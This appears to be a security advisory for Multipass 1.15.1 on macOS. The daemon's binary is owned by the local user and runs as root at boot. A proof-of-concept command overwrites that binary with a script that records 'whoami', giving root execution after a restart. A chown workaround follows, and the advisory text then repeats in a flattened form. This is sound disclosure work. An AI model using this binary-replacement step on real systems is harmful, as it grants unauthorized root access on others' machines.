Impact
Upon installing Multipass 1.15.1 (from Canonical's website) on a macOS host, the following LaunchDaemon is created:
octavio@mac ~ % ls -la /Library/LaunchDaemons/com.canonical.multipassd.plist
-rw-r--r-- 1 root wheel 1131 May 22 13:34 /Library/LaunchDaemons/com.canonical.multipassd.plist
octavio@mac ~ % cat /Library/LaunchDaemons/com.canonical.multipassd.plist
[...]
<key>ProgramArguments</key>
<array>
<string>/Library/Application Support/com.canonical.multipass/bin/multipassd</string>
<string>--verbosity</string>
<string>debug</string>
</array>
[...]
However, the multipassd binary is owned by the local user, and not by root, so it can be replaced with a malicious script:
octavio@mac ~ % echo -ne '#!/bin/sh\nwhoami > /tmp/here\n' > /Library/Application\ Support/com.canonical.multipass/bin/multipassd
This script will be run by the (privileged) daemon upon system restart, which can be used to perform arbitrary actions as root:
octavio@mac ~ % sudo restart
[...]
octavio@mac ~ % cat /tmp/here
root
Patches
Workarounds
If unable to apply the relevant update, the file /Library/Application Support/com.canonical.multipass/bin/multipassd can be set to be owned by root:
sudo chown root:wheel /Library/Application Support/com.canonical.multipass/bin/multipassd
References
isaacatmann Finder
Impact
Upon installing Multipass
1.15.1(from Canonical's website) on a macOS host, the following LaunchDaemon is created:However, the
multipassdbinary is owned by the local user, and not by root, so it can be replaced with a malicious script:This script will be run by the (privileged) daemon upon system restart, which can be used to perform arbitrary actions as root:
Patches
Workarounds
If unable to apply the relevant update, the file
/Library/Application Support/com.canonical.multipass/bin/multipassdcan be set to be owned by root:References